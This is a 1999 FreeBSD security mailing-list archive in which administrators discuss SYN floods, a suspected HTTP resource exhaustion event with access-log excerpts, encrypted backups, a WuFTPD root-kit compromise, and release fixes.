Cc: security@FreeBSD.ORG
In-reply-to: Your message of "Sat, 15 May 1999 00:10:18 +0200." <19990515001018.A22645@foobar.franken.de>
References: <19990515001018.A22645@foobar.franken.de> <199905140438.VAA97604@apollo.backplane.com> <4.2.0.37.19990513161529.00c1e3f0@localhost> <4.2.0.37.19990513202450.0444fca0@localhost> <199905140438.VAA97604@apollo.backplane.com> <19990514072546.A20779@foobar.franken.de> <4.2.0.37.19990514133829.0461e220@localhost> <19990514225001.A22317@foobar.franken.de> <4.2.0.37.19990514154319.04610b80@localhost>
Date: Mon, 17 May 1999 21:07:05 -0600
From: Warner Losh
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message <19990515001018.A22645@foobar.franken.de> Harold Gutch writes:
: Perhaps dropping a random socket is a better approach...

RED has proven to be a good way to deal with congestion. A few years ago
when all of this came up the first time, I did some back of the envelope
calculations that showed that randomly dropping items in the SYN queue
produced a higher percentage chance of connecting to a port under attack
than simply discarding the oldest one in the queue.

Has anybody come up with a fix for this problem? I've not seen one come
across.

Warner

From owner-freebsd-security Mon May 17 20:23:20 1999
Delivered-To: freebsd-security@freebsd.org
Received: from WEBBSD1.turnaround.com.au (webbsd1.turnaround.com.au [203.39.138.49]) by hub.freebsd.org (Postfix) with ESMTP id C451A14D0A for ; Mon, 17 May 1999 20:23:17 -0700 (PDT) (envelope-from A_Johns@TurnAround.com.au)
Received: from TurnAround.com.au (dhcp64.turnaround.com.au [192.168.1.64]) by WEBBSD1.turnaround.com.au (8.8.7/8.8.7) with ESMTP id NAA29605; Tue, 18 May 1999 13:35:20 +1000 (EST) (envelope-from A_Johns@TurnAround.com.au)
Message-ID: <3740DD24.464B5ADC@TurnAround.com.au>
Date: Tue, 18 May 1999 13:23:16 +1000
From: Andrew Johns
Organization: TurnAround Solutions P/L
X-Mailer: Mozilla 4.5 [en] (WinNT; I)
X-Accept-Language: en
MIME-Version: 1.0
To: Unknow User
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: user uses xv3.10a (PNG) to halt my system.
References: <3740B863.6C20B59E@tdnet.com.br>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Unknow User wrote:
>
> Dear gentlemen,
>
> Probably this is not the most suitable mailing list to post this message,
> but it's not worth subscribing to fbsd-questions only to get an answer. (If
> you hate me for that, ignore me.)
>
> a) My system is 2.2.8-STABLE; where can I get an updated list of patches
> for this system?
> b) I have installed xv 3.10a (PNG), but my system got frozen by
> running this software! So now a user (I don't know which) has been
> stopping my system.
> c) Is it possible to know which user is doing that?
> d) How can a user application halt my system? Isn't FreeBSD supposed to be
> robust enough to handle this?
>

It could also be that you and the other user are too impatient - if you're
opening a large image file with 24 bit colour on a machine running in 8-bit
colour AND you have selected the "Best 24->8" dithering option in xv and
you're low on either RAM or CPU grunt (i.e. using a low-end PC) then you can
expect the time to display that image to be a long time - of the order of
several minutes, more so if you're swapping at the same time.

I'd be interested to see the output of top here, whilst xv is running.

A quick question: when you say 'freezed' what do you mean?

a) Totally hung - no response from the machine AT ALL (includes inability
   to reach it across the network).
b) Partially hung - machine is still doing 'something' (disks working/clock
   if visible is still ticking, etc).
c) Not hung - top shows xv using all CPU for a long time, but other
   processes continue to run, although very slowly.
Also,

d) What size images are you trying to use (in k or M)?
e) Does xv start at all, or just 'freeze' the system immediately?

--
Regards                         |  _/\_/\
Andrew Johns BSc (Comp Sci)     | /     \
TurnAround Solutions Pty Ltd    | \_...__/
http://www.turnaround.com.au/   |   \/
"The box said 'Requires Windows 98, NT, Linux or better' so I installed FreeBSD."

From owner-freebsd-security Mon May 17 20:33:57 1999
Delivered-To: freebsd-security@freebsd.org
Received: from smtp.enteract.com (thor.enteract.com [207.229.143.11]) by hub.freebsd.org (Postfix) with SMTP id 5B67914A09 for ; Mon, 17 May 1999 20:33:55 -0700 (PDT) (envelope-from dscheidt@enteract.com)
Received: (qmail 27966 invoked from network); 18 May 1999 03:33:55 -0000
Received: from shell-3.enteract.com (dscheidt@207.229.143.42) by thor.enteract.com with SMTP; 18 May 1999 03:33:55 -0000
Received: from localhost (dscheidt@localhost) by shell-3.enteract.com (8.9.3/8.9.2) with SMTP id WAA06346; Mon, 17 May 1999 22:33:54 -0500 (CDT) (envelope-from dscheidt@enteract.com)
X-Authentication-Warning: shell-3.enteract.com: dscheidt owned process doing -bs
Date: Mon, 17 May 1999 22:33:54 -0500 (CDT)
From: David Scheidt
To: CONDOR
Cc: "'John Fieber'" , Wes Peters , "nr1@ihug.co.nz" , "freebsd-security@FreeBSD.ORG"
Subject: RE: secure backup
In-Reply-To: <01BEA09E.DA43B5A0.condor@inreach.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Mon, 17 May 1999, CONDOR wrote:
:On Mon, 17 May 1999, Wes Peters wrote:
:> > Can anyone recommend how I should go about creating a backup to an untrusted
:> > machine that has the tape drive, and using an untrusted network.
:[CONDOR] Buy a tape drive.. they are cheaper now than before. ;-)

Yeah, but if you are trusting someone to do the tape handling for you, you
need to put encrypted data onto the tape. There are any number of reasons
you might have someone you don't trust handling your tapes. Say you have a
machine in a remote data center, because 'Net connectivity is much cheaper.
I would trust a reputable provider to do backups as I dictated, but I
wouldn't trust them not to take a look at my tapes.

David Scheidt

From owner-freebsd-security Tue May 18 01:55:03 1999
Delivered-To: freebsd-security@freebsd.org
Received: from sentry.granch.ru (sentry.granch.ru [212.20.5.135]) by hub.freebsd.org (Postfix) with ESMTP id 15F5415593 for ; Tue, 18 May 1999 01:54:41 -0700 (PDT) (envelope-from shelton@granch.ru)
Received: from granch.ru (1001@localhost.granch.ru [127.0.0.1]) by sentry.granch.ru (8.8.8/8.8.7) with ESMTP id PAA00316; Tue, 18 May 1999 15:53:44 +0700 (NSS) (envelope-from shelton@granch.ru)
Message-ID: <37412A96.99E83C0E@granch.ru>
Date: Tue, 18 May 1999 15:53:42 +0700
From: "Rashid N. Achilov"
Organization: Granch Ltd.
X-Mailer: Mozilla 4.51 [en] (X11; I; FreeBSD 2.2.8-RELEASE i386)
X-Accept-Language: ru, en
MIME-Version: 1.0
To: Roger Marquis
Cc: security@FreeBSD.ORG
Subject: Re: HTML DOS? (http://microsoft.com/NTServer/all/Downloads.asp)
References:
Content-Type: text/plain; charset=koi8-r
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Roger Marquis wrote:
>
> Has anyone attempted to browse:
>
> http://microsoft.com/NTServer/all/Downloads.asp
>
> using Netscape Navigator and noticed what seems to be an HTML denial of
> service? I've tested this page with Javascript on and off, Java on and
> off, cookies on and off, stylesheets off, under FreeBSD, Linux and
> Solaris and the behavior is consistent:
>
> * Navigator freezes for several seconds
> * CPU utilization climbs briefly to near 100%
> * memory usage climbs by 11MB
> * the 11MB of memory are not released even after leaving
> the page and clearing disk and RAM caches.
>

After 7 minutes of loading, Netscape breaks with a core dump :-( CPU
utilization slowly goes up to 80%, then it goes into a swap-reading state,
CPU utilization goes down, Netscape goes down with a core dump :-( ...
FreeBSD 2.2.8, 32Mb RAM, Java on, JScript on, cookies on. Netscape
Communicator 4.51 English.

--
With Best Regards.
Rashid N. Achilov (RNA1-RIPE), Granch Ltd.
lead engineer
e-mail: achilov@granch.ru, tel (383-2) 24-2363

From owner-freebsd-security Tue May 18 02:39:57 1999
Delivered-To: freebsd-security@freebsd.org
Received: from remus.clara.net (remus.clara.net [195.8.69.79]) by hub.freebsd.org (Postfix) with ESMTP id C990814BD2 for ; Tue, 18 May 1999 02:39:55 -0700 (PDT) (envelope-from mry@clara.net)
Received: from mry (du-027-0222.claranet.co.uk [195.8.81.222]) by remus.clara.net (8.8.8/8.8.8) with SMTP id KAA16534 for ; Tue, 18 May 1999 10:36:35 +0100 (BST) (envelope-from mry@clara.net)
Message-ID: <003c01bea113$08244d80$de5108c3@mry>
From: "Mry"
To:
Subject:
Date: Tue, 18 May 1999 10:44:31 +0100
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 4.72.3110.1
X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3110.3
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

auth d5999d9e subscribe freebsd-security marc@web-land.com

From owner-freebsd-security Tue May 18 02:49:55 1999
Delivered-To: freebsd-security@freebsd.org
Received: from mta2-rme.xtra.co.nz (mta.xtra.co.nz [203.96.92.3]) by hub.freebsd.org (Postfix) with ESMTP id DA06814CFF for ; Tue, 18 May 1999 02:49:51 -0700 (PDT) (envelope-from junkmale@pop3.xtra.co.nz)
Received: from wocker ([210.55.152.50]) by mta2-rme.xtra.co.nz (InterMail v04.00.02.07 201-227-108) with SMTP id <19990518095202.EPCY7623210.mta2-rme@wocker> for ; Tue, 18 May 1999 21:52:02 +1200
From: "Dan Langille"
Organization: The FreeBSD Diary
To: freebsd-security@freebsd.org
Date: Tue, 18 May 1999 21:49:49 +1200
MIME-Version: 1.0
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Subject: http attack(?)
Reply-To: junkmale@xtra.co.nz
X-mailer: Pegasus Mail for Win32 (v3.01d)
Message-Id: <19990518095202.EPCY7623210.mta2-rme@wocker>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

A few days ago, I noticed my machine was running extremely slowly. I did a
top 10 at the console and got "too many open files". Existing telnet
sessions were non-responsive. New telnets would not start.

I then tried a top 5. named and syslogd were busy.

I looked at httpd.error and 21 of these spread over 14 seconds:
[Sat May 15 16:45:34 1999] accept: (client socket): Too many open files in system

Looking in the access logs for one of my virtual websites I found this.
Bits have been snipped to save repetition and conserve space.

per.wave.orc.ru - - [15/May/1999:10:55:57 +1200] "-" 408 -
per.wave.orc.ru - - [15/May/1999:10:56:58 +1200] "-" 408 -

[etc]

per.wave.orc.ru - - [15/May/1999:16:42:21 +1200] "-" 408 -
per.wave.orc.ru - - [15/May/1999:16:42:49 +1200] "-" 408 -
212.48.133.22 - - [15/May/1999:16:45:30 +1200] "-" 408 -
212.48.133.22 - - [15/May/1999:16:46:19 +1200] "-" 408 -

[at which point I guess httpd decided not to translate any more or named gave up]

[this is also roughly the point at which I noticed the system was slowing]

212.48.133.22 - - [15/May/1999:16:55:35 +1200] "-" 408 -
212.48.133.22 - - [15/May/1999:16:55:40 +1200] "-" 408 -
per.wave.orc.ru - - [15/May/1999:16:55:47 +1200] "-" 408 -
per.wave.orc.ru - - [15/May/1999:16:55:47 +1200] "-" 408 -
per.wave.orc.ru - - [15/May/1999:16:55:48 +1200] "-" 408 -
per.wave.orc.ru - - [15/May/1999:16:55:48 +1200] "-" 408 -
212.48.133.22 - - [15/May/1999:16:55:59 +1200] "-" 408 -
per.wave.orc.ru - - [15/May/1999:16:56:05 +1200] "-" 408 -
per.wave.orc.ru - - [15/May/1999:16:56:47 +1200] "-" 408 -

[etc]

per.wave.orc.ru - - [15/May/1999:17:14:13 +1200] "-" 408 -

[ends]

I shortly thereafter started blocking this address at my firewall. A
further 200 or so packets were blocked. No further activity has been seen.
Messages sent to various addresses at orc.ru have gone unanswered.

Is this a known attack? A browser gone mad?

A remark on irc was that httpd was trying to consume more resources than
the machine possessed.

--
Dan Langille - DVL Software Limited
The FreeBSD Diary - http://www.FreeBSDDiary.org/freebsd/
NZ FreeBSD User Group - http://www.nzfug.nz.freebsd.org/
The Racing System - http://www.racingsystem.com/racingsystem.htm

From owner-freebsd-security Tue May 18 03:15:56 1999
Delivered-To: freebsd-security@freebsd.org
Received: from mail.prime.net.ua (mail.prime.net.ua [195.64.229.2]) by hub.freebsd.org (Postfix) with ESMTP id 539F414CFF for ; Tue, 18 May 1999 03:15:49 -0700 (PDT) (envelope-from andyo@mail.prime.net.ua)
Received: from localhost (andyo@localhost) by mail.prime.net.ua (8.9.3/8.9.3) with SMTP id NAA16998; Tue, 18 May 1999 13:15:29 +0300 (EEST)
Date: Tue, 18 May 1999 13:15:28 +0300 (EEST)
From: "Andy V. Oleynik"
To: Dan Langille
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: http attack(?)
In-Reply-To: <19990518095202.EPCY7623210.mta2-rme@wocker>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

If U remember, there was a problem in sendmail up to 8.9.2 with a msgheader
length exploit (starting 5 sessions catastrophically slowed the system
down). My guess is that giving a request to HTTP like this
"GET /vary.long.maybe.even.not.existent.URL..." could lead to this problem.
But it may be a question for apache.org.

On Tue, 18 May 1999, Dan Langille wrote:

> A few days ago, I noticed my machine was running extremely slowly. I did a
> top 10 at the console and got "too many open files". Existing telnet
> sessions were non-responsive. New telnets would not start.
>
> I then tried a top 5. named and syslogd were busy.
>
> I looked at httpd.error and 21 of these spread over 14 seconds:
> [Sat May 15 16:45:34 1999] accept: (client socket): Too many open files in system
>
> Looking in the access logs for one of my virtual websites I found this.
> Bits have been snipped to save repetition and conserve space.
>
> per.wave.orc.ru - - [15/May/1999:10:55:57 +1200] "-" 408 -
> per.wave.orc.ru - - [15/May/1999:10:56:58 +1200] "-" 408 -
>
> [etc]
>
> per.wave.orc.ru - - [15/May/1999:16:42:21 +1200] "-" 408 -
> per.wave.orc.ru - - [15/May/1999:16:42:49 +1200] "-" 408 -
> 212.48.133.22 - - [15/May/1999:16:45:30 +1200] "-" 408 -
> 212.48.133.22 - - [15/May/1999:16:46:19 +1200] "-" 408 -
>
> [at which point I guess httpd decided not to translate any more or named gave up]
>
> [this is also roughly the point at which I noticed the system was slowing]
>
> 212.48.133.22 - - [15/May/1999:16:55:35 +1200] "-" 408 -
> 212.48.133.22 - - [15/May/1999:16:55:40 +1200] "-" 408 -
> per.wave.orc.ru - - [15/May/1999:16:55:47 +1200] "-" 408 -
> per.wave.orc.ru - - [15/May/1999:16:55:47 +1200] "-" 408 -
> per.wave.orc.ru - - [15/May/1999:16:55:48 +1200] "-" 408 -
> per.wave.orc.ru - - [15/May/1999:16:55:48 +1200] "-" 408 -
> 212.48.133.22 - - [15/May/1999:16:55:59 +1200] "-" 408 -
> per.wave.orc.ru - - [15/May/1999:16:56:05 +1200] "-" 408 -
> per.wave.orc.ru - - [15/May/1999:16:56:47 +1200] "-" 408 -
>
> [etc]
>
> per.wave.orc.ru - - [15/May/1999:17:14:13 +1200] "-" 408 -
>
> [ends]
>
> I shortly thereafter started blocking this address at my firewall. A
> further 200 or so packets were blocked. No further activity has been seen.
> Messages sent to various addresses at orc.ru have gone unanswered.
>
> Is this a known attack? A browser gone mad?
>
> A remark on irc was that httpd was trying to consume more resources than
> the machine possessed.
> --
> Dan Langille - DVL Software Limited
> The FreeBSD Diary - http://www.FreeBSDDiary.org/freebsd/
> NZ FreeBSD User Group - http://www.nzfug.nz.freebsd.org/
> The Racing System - http://www.racingsystem.com/racingsystem.htm
>

From owner-freebsd-security Tue May 18 03:29:22 1999
Delivered-To: freebsd-security@freebsd.org
Received: from mail-gw2.pacbell.net (mail-gw2.pacbell.net [206.13.28.53]) by hub.freebsd.org (Postfix) with ESMTP id 747DB1545F for ; Tue, 18 May 1999 03:29:21 -0700 (PDT) (envelope-from wellsian@caffeine.com)
Received: from smartypants.caffeine.com. (adsl-209-233-24-51.dsl.snfc21.pacbell.net [209.233.24.51]) by mail-gw2.pacbell.net (8.8.8/8.7.1+antispam) with ESMTP id DAA02014 for ; Tue, 18 May 1999 03:29:20 -0700 (PDT)
Date: Tue, 18 May 1999 03:26:05 -0700 (PDT)
From: wellsian
To: security@FreeBSD.ORG
Subject: Re: network scan?
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> > > > Just to make sure I'm getting this right - you're saying China
> > > > has a censored internet gateway (i.e. blocking *something* [what
> > > > exactly ?] ), but they do allow connections to ports 1080, 3128
> > > > and 8080 ?
> > >
> > > They block access to sites, not to ports. In particular, sites that
> > > carry capitalist misinformation, or what we in the free world call
> > > "news."
> >
> > Hmm, but who can tell where EXACTLY *they* are trying to go to ? As in,
> > can you see things like 'www.abc.com' and such ? Or is it more like
> > along the lines of www.max-XXX.org - you get the idea ?
>
> Not unless you have a proxy up, no. But I do see where you're going.
> My response *must* be "Get your mind out of the gutter (so mine can
> float by.)" ;^)

As I understand it they're using transparent proxies. Could be big inktomi
iron, alteon, or just some fbsd boxes. They can do anything from simple
blocking to re-routing users to "cleansed" versions of otherwise
objectionable sites. CNN might start to get interesting after censors had
their way. :) And the users never have to know... (Sure, someone would
figure it out but would the masses care or understand?)
Dave

From owner-freebsd-security Tue May 18 05:51:20 1999
Delivered-To: freebsd-security@freebsd.org
Received: from unix1.it-datacntr.louisville.edu (unix1.it-datacntr.louisville.edu [136.165.4.27]) by hub.freebsd.org (Postfix) with ESMTP id C3329156D6 for ; Tue, 18 May 1999 05:50:46 -0700 (PDT) (envelope-from k.stevenson@louisville.edu)
Received: from homer.louisville.edu (ktstev01@homer.louisville.edu [136.165.1.20]) by unix1.it-datacntr.louisville.edu (8.8.8/8.8.7) with ESMTP id IAA24906 for ; Tue, 18 May 1999 08:50:44 -0400
Received: (from ktstev01@localhost) by homer.louisville.edu (8.8.8/8.8.8) id IAA08118 for freebsd-security@freebsd.org; Tue, 18 May 1999 08:50:44 -0400 (EDT)
Message-ID: <19990518085043.A6970@homer.louisville.edu>
Date: Tue, 18 May 1999 08:50:43 -0400
From: Keith Stevenson
To: freebsd-security@freebsd.org
Subject: Re: Interesting Attack
References:
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.93.2i
In-Reply-To: ; from Kris Kennaway on Tue, May 18, 1999 at 09:19:18AM +0930
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Tue, May 18, 1999 at 09:19:18AM +0930, Kris Kennaway wrote:
>
> I was getting hundreds of similar packets per day here a few weeks ago, almost
> all from different sites, all from spoofed source addresses, to a nonexistent
> IP address and on an unobtrusive port number (1584) but the common thread was
> that all of the source hosts were running an IRC daemon. I never did find out
> conclusively what it was, but my guess is that someone was using my source
> address to spoof packets from, and I was seeing reverse probes by the IRC
> server.
>
> It all stopped when I turned on IP unreachables on my firewall..

We just had a Linux box fall victim to the WuFTPD/realpath(3) exploit. The
cracker installed a slew of IRC tools, a sniffer, and a scanner which behaved
very similarly to what you described. Thankfully it was on a switched network
which limited the damage done by the sniffer, and the script-kiddie who broke
in neglected to install the trojans included in his root-kit. This made the
ircd very easy to find once the Linux-user noticed that his system load was
awfully high.

Anyway, since this thing had "root-kit" written all over it, it wouldn't
surprise me in the slightest if there are lots of broken linux boxen on the
internet running these scans.
Regards,
--Keith Stevenson--

--
Keith Stevenson
System Programmer - Data Center Services - University of Louisville
k.stevenson@louisville.edu
PGP key fingerprint = 4B 29 A8 95 A8 82 EA A2 29 CE 68 DE FC EE B6 A0

From owner-freebsd-security Tue May 18 09:40:44 1999
Delivered-To: freebsd-security@freebsd.org
Received: from xylan.com (postal.xylan.com [208.8.0.248]) by hub.freebsd.org (Postfix) with ESMTP id 8C63014F1C for ; Tue, 18 May 1999 09:40:38 -0700 (PDT) (envelope-from wes@softweyr.com)
Received: from mailhub.xylan.com by xylan.com (8.8.7/SMI-SVR4 (xylan-mgw 2.2 [OUT])) id JAA13413; Tue, 18 May 1999 09:39:39 -0700 (PDT)
Received: from omni.xylan.com by mailhub.xylan.com (SMI-8.6/SMI-SVR4 (mailhub 2.1 [HUB])) id JAA02426; Tue, 18 May 1999 09:39:39 -0700
Received: from softweyr.com (dyn1.utah.xylan.com) by omni.xylan.com (4.1/SMI-4.1 (xylan engr [SPOOL])) id AA04688; Tue, 18 May 99 09:39:33 PDT
Message-Id: <374197C5.AD8734F5@softweyr.com>
Date: Tue, 18 May 1999 10:39:33 -0600
From: Wes Peters
Organization: Softweyr LLC
X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386)
X-Accept-Language: en
Mime-Version: 1.0
To: "Rashid N. Achilov"
Cc: Roger Marquis , security@FreeBSD.ORG
Subject: Re: HTML DOS? (http://microsoft.com/NTServer/all/Downloads.asp)
References: <37412A96.99E83C0E@granch.ru>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

"Rashid N. Achilov" wrote:
>
> Roger Marquis wrote:
> >
> > Has anyone attempted to browse:
> >
> > http://microsoft.com/NTServer/all/Downloads.asp
> >
> > using Netscape Navigator and noticed what seems to be an HTML denial of
> > service? I've tested this page with Javascript on and off, Java on and
> > off, cookies on and off, stylesheets off, under FreeBSD, Linux and
> > Solaris and the behavior is consistent:
> >
> > * Navigator freezes for several seconds
> > * CPU utilization climbs briefly to near 100%
> > * memory usage climbs by 11MB
> > * the 11MB of memory are not released even after leaving
> > the page and clearing disk and RAM caches.
> >
>
> After 7 minutes of loading, Netscape breaks with a core dump :-( CPU
> utilization slowly goes up to 80%, then it goes into a swap-reading state,
> CPU utilization goes down, Netscape goes down with a core dump :-( ...
> FreeBSD 2.2.8, 32Mb RAM, Java on, JScript on, cookies on. Netscape
> Communicator 4.51 English.

Machine: PII/300, 64MB, NeoMagic 128.
Netscape: 4.51 Linux/ELF
FreeBSD: 3.1-RELEASE

Netscape topped out at 83.45% CPU, but drew the page in 1:05.

--
"Where am I, and what am I doing in this handbasket?"
Wes Peters                                                    Softweyr LLC
http://www.softweyr.com/~softweyr                             wes@softweyr.com

From owner-freebsd-security Tue May 18 10:09:23 1999
Delivered-To: freebsd-security@freebsd.org
Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id B470914FC9 for ; Tue, 18 May 1999 10:09:19 -0700 (PDT) (envelope-from brett@lariat.org)
Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id LAA05646 for ; Tue, 18 May 1999 11:09:16 -0600 (MDT)
Message-Id: <4.2.0.37.19990518110133.00b58da0@localhost>
X-Sender: brett@localhost
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.37 (Beta)
Date: Tue, 18 May 1999 11:09:12 -0600
To: security@FreeBSD.ORG
From: Brett Glass
Subject: Is 3.2-R safe?
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Just saw the announcement of 3.2-R. We'd been planning to migrate some of
our systems to this version, but before we install, we need to know: Has
the "double free" problem that causes the system to crash under a SYN flood
attack been fixed?

--Brett Glass

From owner-freebsd-security Tue May 18 15:33:23 1999
Delivered-To: freebsd-security@freebsd.org
Received: from aniwa.sky (p22-max8.wlg.ihug.co.nz [209.79.142.214]) by hub.freebsd.org (Postfix) with ESMTP id A893714DDA for ; Tue, 18 May 1999 15:33:14 -0700 (PDT) (envelope-from andrew@squiz.co.nz)
Received: from aniwa.sky (localhost [127.0.0.1]) by aniwa.sky (8.9.1a/8.9.1) with ESMTP id BAA09186; Wed, 19 May 1999 01:56:28 +1200 (NZST)
Message-Id: <199905181356.BAA09186@aniwa.sky>
X-Mailer: exmh version 2.0.2 2/24/98
To: junkmale@xtra.co.nz
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: http attack(?)
In-reply-to: Your message of "Tue, 18 May 1999 21:49:49 +1200." <19990518095202.EPCY7623210.mta2-rme@wocker>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Wed, 19 May 1999 01:56:28 +1200
From: Andrew McNaughton
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> A few days ago, I noticed my machine was running extremely slowly. I did a
> top 10 at the console and got "too many open files". Existing telnet
> sessions were non-responsive. New telnets would not start.
>
> I then tried a top 5. named and syslogd were busy.
>
> I looked at httpd.error and 21 of these spread over 14 seconds:
> [Sat May 15 16:45:34 1999] accept: (client socket): Too many open files in system

I'm not too sure whether to trust that the restriction on file handles is
system wide. Some programs may not know about FreeBSD's process limits
scheme.

Check the output of 'limits' and 'sysctl -a | grep maxfiles'. They might
give you a better idea what is happening. The context in which you run
limits is important, but if your shell is failing, then that shell is
probably a good thing to have a look at. limits is a shell built-in under
sh and bash, and will not spawn a new process.

Andrew McNaughton

--
-----------
Andrew McNaughton
andrew@squiz.co.nz
http://www.newsroom.co.nz/

From owner-freebsd-security Tue May 18 15:33:41 1999
Delivered-To: freebsd-security@freebsd.org
Received: from aniwa.sky (p22-max8.wlg.ihug.co.nz [209.79.142.214]) by hub.freebsd.org (Postfix) with ESMTP id C0B29154B5 for ; Tue, 18 May 1999 15:33:14 -0700 (PDT) (envelope-from andrew@squiz.co.nz)
Received: from aniwa.sky (localhost [127.0.0.1]) by aniwa.sky (8.9.1a/8.9.1) with ESMTP id BAA09208; Wed, 19 May 1999 01:58:19 +1200 (NZST)
Message-Id: <199905181358.BAA09208@aniwa.sky>
X-Mailer: exmh version 2.0.2 2/24/98
To: Kris Kennaway
Cc: Adam Shostack , Adam Shostack , nr1@ihug.co.nz, freebsd-security@FreeBSD.ORG
Subject: Re: secure backup
In-reply-to: Your message of "Mon, 17 May 1999 23:09:09 +0930."
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Wed, 19 May 1999 01:58:19 +1200
From: Andrew McNaughton
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Kris Kennaway wrote:

> I was talking about authentication for access to the tape server process
> itself (preventing other people from writing onto your tape). You're correct
> about PGP - it's probably better to use PGP instead of bdes (or equivalent
> symmetric encryption filter) for this reason - verification that your data
> stream was read back intact (and assuming perfect retrieval, was stored
> intact) when you restore.

If the backup is bigger than available space, then the stream would have to
be processed twice, once to do the checksum, and then if that passed, a
second time to actually restore files. Backups tend to be large, and
temporary storage of the received stream is likely not to be an option.

No doubt some sort of block checksumming approach could be taken.

Andrew McNaughton

--
-----------
Andrew McNaughton
andrew@squiz.co.nz
http://www.newsroom.co.nz/

From owner-freebsd-security Tue May 18 17:04:56 1999
Delivered-To: freebsd-security@freebsd.org
Received: from adelphi.physics.adelaide.edu.au (adelphi.physics.adelaide.edu.au [129.127.36.247]) by hub.freebsd.org (Postfix) with ESMTP id CC77914D52 for ; Tue, 18 May 1999 17:04:51 -0700 (PDT) (envelope-from kkennawa@physics.adelaide.edu.au)
Received: from bragg (bragg [129.127.36.34]) by adelphi.physics.adelaide.edu.au (8.8.8/8.8.8/UofA-1.5) with SMTP id JAA07492; Wed, 19 May 1999 09:34:50 +0930 (CST)
Received: from localhost by bragg; (5.65/1.1.8.2/05Aug95-0227PM) id AA09371; Wed, 19 May 1999 09:35:40 +0930
Date: Wed, 19 May 1999 09:35:39 +0930 (CST)
From: Kris Kennaway
X-Sender: kkennawa@bragg
To: Keith Stevenson
Cc: freebsd-security@freebsd.org
Subject: Re: Interesting Attack
In-Reply-To: <19990518085043.A6970@homer.louisville.edu>
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Tue, 18 May 1999, Keith Stevenson wrote:

> We just had a Linux box fall victim to the WuFTPD/realpath(3) exploit. The
> cracker installed a slew of IRC tools, a sniffer, and a scanner which behaved
> very similarly to what you described. Thankfully it was on a switched network
> which limited the damage done by the sniffer, and the script-kiddie who broke
> in neglected to install the trojans included in his root-kit. This made the
> ircd very easy to find once the Linux-user noticed that his system load was
> awfully high.
>
> Anyway, since this thing had "root-kit" written all over it, it wouldn't
> surprise me in the slightest if there are lots of broken linux boxen on the
> internet running these scans.

I thought of that too in my case, but port-scanning some of the originating boxes showed no common threads other than they were all running IRC daemons. nmap reported a wide range of OSes, too (including a lot of BSDs), and from correspondence with the admins they showed nothing out of the ordinary on their systems.

Kris

> Regards,
> --Keith Stevenson--
>
> --
> Keith Stevenson
> System Programmer - Data Center Services - University of Louisville
> k.stevenson@louisville.edu
> PGP key fingerprint = 4B 29 A8 95 A8 82 EA A2 29 CE 68 DE FC EE B6 A0
>

-----
"That suit's sharper than a page of Oscar Wilde witticisms that's been rolled up into a point, sprinkled with lemon juice and jabbed into someone's eye"
"Wow, that's sharp!"
- Ace Rimmer and the Cat, _Red Dwarf_

From owner-freebsd-security Wed May 19 5: 2:14 1999
Delivered-To: freebsd-security@freebsd.org
Received: from ints.ru (ints.ru [194.67.173.1]) by hub.freebsd.org (Postfix) with ESMTP id 54E4B14C4A for ; Wed, 19 May 1999 05:02:03 -0700 (PDT) (envelope-from ilmar@ws-ilmar.ints.ru)
Received: from ws-ilmar.ints.ru (ws-ilmar.ints.ru [194.67.173.16]) by ints.ru (8.9.2/8.9.2) with ESMTP id QAA28742; Wed, 19 May 1999 16:02:01 +0400 (MSD)
